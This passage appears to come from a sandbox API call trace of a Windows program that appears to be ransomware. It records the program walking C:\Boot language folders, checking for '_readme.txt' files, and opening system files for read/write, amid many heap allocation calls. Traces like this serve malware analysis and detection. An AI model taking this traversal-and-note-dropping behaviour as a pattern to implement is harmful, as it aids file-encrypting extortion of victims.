lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.942] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0129.942] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0129.942] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.942] PathFindFileNameW (pszPath="") returned="" [0129.942] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.943] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.943] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.943] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.943] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0129.943] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0129.944] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe373bb00, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.944] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe373bb00, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.944] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.944] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0129.944] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.945] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe373bb00, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe373bb00, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.945] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned=".txt" [0129.945] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe373bb00, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe373bb00, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.945] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.945] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.945] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.945] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0129.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0129.945] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0129.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.945] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.945] PathFindFileNameW (pszPath="") returned="" [0129.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.946] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.946] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0129.946] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0129.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.947] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0129.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2280 [0129.947] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0129.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.947] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0129.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.947] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.948] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.948] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.948] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.948] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.948] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.948] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.948] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0129.948] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.948] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.948] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3787dc0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.948] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.948] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.948] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.948] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned=".txt" [0129.948] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.948] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3787dc0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.948] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.948] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.948] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0129.949] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0129.949] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.949] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.949] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.950] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.950] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.951] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.951] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 